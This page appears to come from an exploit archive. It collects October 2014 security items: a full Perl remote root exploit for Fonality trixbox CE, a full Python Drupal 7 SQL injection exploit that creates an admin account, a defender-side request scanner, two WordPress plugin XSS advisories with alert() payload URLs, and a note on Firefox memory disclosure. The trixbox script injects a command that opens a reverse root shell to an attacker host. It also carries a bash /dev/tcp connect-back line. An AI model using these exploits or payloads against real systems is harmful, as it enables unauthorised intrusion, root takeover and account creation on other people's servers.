    stime = Time.now.to_f
    print_status "Starting the payload handler..."
    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
      Rex.sleep(1)
    end
  end
end


17 Oct 2014

Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/
# Vulnerable file: maint/modules/home/index.php
#
# Description:
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the
# asterisk user, which can then be leveraged to root privilege through sudo.
#
# from /etc/sudoers:
## asterisk ALL = NOPASSWD: /bin/bash
# 
# Vulnerable code:  
# Line 68: $tbLang = $_GET['lang'];
# Line 339: shell_exec $phpOutput = shell_exec('php -q libs/status.php ' . $tbLang); 
#
# Note:
# We did a full audit of Fonality trixbox CE 2.8.0.4 and we found several similar vulnerabilities (File disclosure, command/code execution etc).
# We didn't think it was necessary to cover all the findings since support for the CE edition has been discontinued
# but anyone who thinks about installing this should think twice.
#
# Download:
# http://www.morxploit.com/morxploits/morxtrix.pl
#
# Demo:
# perl trixbox.pl http://10.0.0.16 10.0.0.2 1111
#
# ===================================================
# --- Fonality trixbox remote root exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] MorXploiting http://10.0.0.16/maint/modules/home/index.php
# [+] Sent payload! Waiting for connect back root shell ...
# [+] Et voila you are in!
#
# Linux trixbox1.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 i686 i386 GNU/Linux
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
 
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use strict;
 
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Fonality trixbox CE remote root exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
 
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport>\n";
print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
exit;
}
 
my $host = $ARGV[0];
my $vuln = "maint/modules/home/index.php";
my $cbhost = $ARGV[1];
my $cbport = $ARGV[2];
my $defuser = "maint"; # Default maint user
my $defpass = "password"; # Default maint pass
my $string = "$defuser:$defpass";
my $encoded = encode_base64($string);
$| = 1;
$SIG{CHLD} = 'IGNORE';
 
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
 
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}
 
banner();
print "[*] MorXploiting $host/$vuln\n";
 
#my $payload = "sudo /bin/bash -i >%26 /dev/tcp/$cbhost/$cbport 0>%261"; # Bash connect back
my $payload = "sudo /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">%26SOCKET\\\"); open(STDOUT,\\\">%26SOCKET\\\"); open(STDERR,\\\">%26SOCKET\\\"); print \\\"[%2b] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\"";
my $exploit = $ua->get("$host/$vuln?lang=;$payload", Authorization => "Basic $encoded");
print "[+] Sent payload! Waiting for connect back root shell ...\n";
 
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
 
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
# write only the unsent remainder (length, offset) instead of resending the whole buffer after a short write
my $written_len = syswrite($dst, $buf, $write_len, $read_len - $write_len);
return unless $written_len;
$write_len -= $written_len;
}
}
}


17 Oct 2014

Drupal 7.X SQL Injection

#!/usr/bin/python
#
# 
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
 
import hashlib, urllib2, optparse, random, sys
 
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.
 
class DrupalHash:
 
  def __init__(self, stored_hash, password):
    self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    self.last_hash = self.rehash(stored_hash, password)
 
  def get_hash(self):
    return self.last_hash
 
  def password_get_count_log2(self, setting):
    return self.itoa64.index(setting[3])
 
  def password_crypt(self, algo, password, setting):
    setting = setting[0:12]
    if setting[0] != '$' or setting[2] != '$':
      return False
 
    count_log2 = self.password_get_count_log2(setting)
    salt = setting[4:12]
    if len(salt) < 8:
      return False
    count = 1 << count_log2
 
    if algo == 'md5':
      hash_func = hashlib.md5
    elif algo == 'sha512':
      hash_func = hashlib.sha512
    else:
      return False
    hash_str = hash_func(salt + password).digest()
    for c in range(count):
      hash_str = hash_func(hash_str + password).digest()
    output = setting + self.custom64(hash_str)
    return output
 
  def custom64(self, string, count = 0):
    if count == 0:
      count = len(string)
    output = ''
    i = 0
    itoa64 = self.itoa64
    while 1:
      value = ord(string[i])
      i += 1
      output += itoa64[value & 0x3f]
      if i < count:
        value |= ord(string[i]) << 8
      output += itoa64[(value >> 6) & 0x3f]
      if i >= count:
        break
      i += 1
      if i < count:
        value |= ord(string[i]) << 16
      output += itoa64[(value >> 12) & 0x3f]
      if i >= count:
        break
      i += 1
      output += itoa64[(value >> 18) & 0x3f]
      if i >= count:
        break
    return output
 
  def rehash(self, stored_hash, password):
    # Drupal 6 compatibility
    if len(stored_hash) == 32 and stored_hash.find('$') == -1:
      return hashlib.md5(password).hexdigest()
      # Drupal 7
    if stored_hash[0:2] == 'U$':
      stored_hash = stored_hash[1:]
      password = hashlib.md5(password).hexdigest()
    hash_type = stored_hash[0:3]
    if hash_type == '$S$':
      hash_str = self.password_crypt('sha512', password, stored_hash)
    elif hash_type == '$H$' or hash_type == '$P$':
      hash_str = self.password_crypt('md5', password, stored_hash)
    else:
      hash_str = False
    return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
 
def randomAgentGen():
 
 userAgent =    ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
                'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
                'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
                'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
 
 UA = random.choice(userAgent)
 return UA
 
 
def urldrupal(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    # Page login
    url = url+'/?q=node&destination=node'
    return url
 
 
banner = """
  ______                          __     _______  _______ _____    
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |   
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |   
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |   
 |:  1    /          |__|                 |   |  |:  1   | |:  |   
 |::.. . /                                |   |  |::.. . | |::.|   
 `------'                                 `---'  `-------' `---'   
  _______       __     ___       __            __   __             
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                               
 |::.. . |            |::.|                                        
 `-------'            `---'                                        
 
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r
 
        Discovered by:
 
        Stefan  Horst
                         (CVE-2014-3704)
 
                           Written by:
 
                         Claudio Viviani
 
                      http://www.homelab.it
 
                         info@homelab.it
                     homelabit@protonmail.ch
 
                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
"""
 
commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
                  action="store",
                  help="Insert URL: http[s]://www.victim.com",
                  )
commandList.add_option('-u', '--username',
                  action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd',
                  action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.username or not options.pwd:
    print(banner)
    print
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
host = options.target
user = options.username
password = options.pwd
 
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
 
target = urldrupal(host)
 
 
# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
 
UA = randomAgentGen()
try:
    req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
    content = urllib2.urlopen(req).read()
 
    if "mb_strlen() expects parameter 1" in content:
        print "[!] VULNERABLE!"
        print
        print "[!] Administrator user created!"
        print
        print "[*] Login: "+str(user)
        print "[*] Pass: "+str(password)
        print "[*] Url: "+str(target)
 
    else:
        print "[X] NOT Vulnerable :("
 
except urllib2.HTTPError as e:
 
    print "[X] HTTP Error: "+str(e.reason)+" ("+str(e.code)+")"
 
except urllib2.URLError as e:
 
    print "[X] Connection error: "+str(e.reason)
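As an added, defender-side example (not code from either exploit author), the following Python 3 checks request records for the two injection shapes shown on this page: the Drupal SA-CORE-2014-005 SQL injection carried in the bracket key of the login form's `name[...]` parameter, and the trixbox CE command injection through the `lang` query parameter of `maint/modules/home/index.php`. The sample requests, the host `drupal.example` and the rule names are constructed; parameter splitting mimics PHP's `&`-only form parsing so the injected key survives decoding intact.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# A PHP-style array parameter looks like base[inner]; in a real Drupal login
# form the inner part is an index or short token such as "0" (name[0]=...).
ARRAY_KEY = re.compile(r"^[A-Za-z_]\w*\[(?P<inner>[^\]]*)\]")
SAFE_INNER = re.compile(r"^[\w.-]*$")
# Characters that let a parameter value escape a shell command line.
SHELL_META = re.compile(r"[;|&`$()\r\n]")
TRIXBOX_PATH = "/maint/modules/home/index.php"


def _pairs(query):
    """Split on '&' only, as PHP does, decoding %XX and '+' on both sides."""
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def drupal_array_key_injection(body):
    """Return form keys whose bracket contents are not a plain array index."""
    hits = []
    for key, _value in _pairs(body):
        match = ARRAY_KEY.match(key)
        if match and not SAFE_INNER.match(match.group("inner")):
            hits.append(key)
    return hits


def trixbox_lang_injection(url):
    """Return 'lang' values carrying shell metacharacters on the maint page."""
    parts = urlsplit(url)
    if not parts.path.endswith(TRIXBOX_PATH):
        return []
    return [value for key, value in _pairs(parts.query)
            if key == "lang" and SHELL_META.search(value)]


def scan_requests(requests):
    """Apply both rules; return (request index, rule name, evidence) tuples."""
    findings = []
    for index, request in enumerate(requests):
        if request["method"] == "POST":
            for key in drupal_array_key_injection(request.get("body", "")):
                findings.append((index, "drupal-sa-core-2014-005", key))
        for value in trixbox_lang_injection(request["url"]):
            findings.append((index, "trixbox-lang-cmdi", value))
    return findings


# Constructed sample traffic (not real logs): a normal Drupal login, a login
# body shaped like the exploit above, a normal trixbox page load and an
# injected one.
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "http://drupal.example/?q=node&destination=node",
     "body": "name=alice&pass=s3cret&form_id=user_login_block&op=Log+in"},
    {"method": "POST", "url": "http://drupal.example/?q=node&destination=node",
     "body": "name[0%20;insert+into+users_roles+(uid,+rid)+VALUES+(2,+3);;#%20%20]=x"
             "&name[0]=test&pass=x&form_id=user_login_block&op=Log+in"},
    {"method": "GET", "url": "http://10.0.0.16/maint/modules/home/index.php?lang=en"},
    {"method": "GET",
     "url": "http://10.0.0.16/maint/modules/home/index.php?lang=en%3Buname+-a"},
]

if __name__ == "__main__":
    for index, rule, evidence in scan_requests(SAMPLE_REQUESTS):
        print("request %d: %s: %r" % (index, rule, evidence))
```

The Drupal rule keys on the parameter name rather than on SQL keywords, because the fixed code path (SA-CORE-2014-005) is reachable through any array key, not only the literal query shown above.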


16 Oct 2014

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237
Product: MaxButtons WordPress plugin
Vendor: Max Foundry
Vulnerable Version(s): 1.26.0 and probably prior
Tested Version: 1.26.0
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: October 2, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7181
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered a vulnerability in the MaxButtons WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against a logged-in administrator.
 
 
1) Reflected Cross-Site Scripting (XSS) in MaxButtons wordpress plugin: CVE-2014-7181
 
Input passed via the "id" HTTP GET parameter to the "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
http://wordpress/wp-admin/admin.php?page=maxbuttons-controller&action=button&id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to MaxButtons 1.26.1
 
More Information:
https://wordpress.org/plugins/maxbuttons/changelog/
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23237 - https://www.htbridge.com/advisory/HTB23237 - Reflected Cross-Site Scripting (XSS) in MaxButtons WordPress Plugin.
[2] MaxButtons WordPress plugin - http://maxfoundry.com/ - The best WordPress button generator.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.


16 Oct 2014

WordPress WP Google Maps 6.0.26 Cross Site Scripting

Advisory ID: HTB23236
Product: WP Google Maps WordPress plugin
Vendor: WP Google Maps 
Vulnerable Version(s): 6.0.26 and probably prior
Tested Version: 6.0.26
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: September 29, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7182
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered three XSS vulnerabilities in the WP Google Maps WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrators of a vulnerable WordPress website.
 
1) Multiple XSS in WP Google Maps WordPress plugin: CVE-2014-7182
 
1.1 Input passed via the "poly_id" HTTP GET parameter to the "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
http://wordpress/wp-admin/admin.php?page=wp-google-maps-menu&action=edit_poly&map_id=1&poly_id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.2 Input passed via the "poly_id" HTTP GET parameter to the "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
http://wordpress/wp-admin/admin.php?page=wp-google-maps-menu&action=edit_polyline&map_id=1&poly_id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.3 Input passed via the "poly_id" HTTP GET parameter to the "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
http://wordpress/wp-admin/admin.php?page=wp-google-maps-menu&action=edit_marker&id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to WP Google Maps 6.0.27
 
More Information:
https://wordpress.org/plugins/wp-google-maps/changelog/
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23236 - https://www.htbridge.com/advisory/HTB23236 - Multiple Cross-Site Scripting (XSS) in WP Google Maps WordPress Plugin.
[2] WP Google Maps WordPress plugin - http://www.wpgmaps.com/ - The easiest to use Google Maps plugin! Create custom Google Maps with high quality markers containing locations, descriptions, images and links. Add your customized map to your WordPress posts and/or pages quickly and easily with the supplied shortcode.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.


14 Oct 2014

Mozilla browser mem disclosure bugs (CVE-2014-1580)

REFERENCE: https://access.redhat.com/security/cve/CVE-2014-1580

CVE-2014-1580
Impact: Moderate
Public: 2014-10-14
Bugzilla: 1152362: CVE-2014-1580 Mozilla: Further uninitialized memory use during GIF rendering (MFSA 2014-78)

Public POC:

First of all, CVE-2014-1580 (MFSA 2014-78) is a bug that caused Firefox prior to version 33 (released today) to leak bits of uninitialized memory when rendering certain types of truncated images onto <canvas>.
 
Mozilla's advisory is here:
https://www.mozilla.org/security/announce/2014/mfsa2014-78.html
 
Bug is here:
https://bugzilla.mozilla.org/show_bug.cgi?id=1063733
 
PoC is here:
http://lcamtuf.coredump.cx/ffgif2/
 
Secondly, MSRC case #19611cz is a seemingly similar issue with Internet Explorer apparently using bits of uninitialized stack data when handling JPEG files with an oddball DHT. 
You should be able to reproduce with:
 
http://lcamtuf.coredump.cx/iepuzzle/canvas.html
 
This one doesn't have a fix yet; I decided to disclose it because it is easily hit with an existing open-source fuzzer, and because we went past the 90-day mark without making any evident progress on the report. 
The timeline is captured here:
 
http://lcamtuf.blogspot.com/2014/10/two-more-browser-memory-disclosure-bugs.html
 
Obligatory plug - both of these have been found with:
http://code.google.com/p/american-fuzzy-lop/
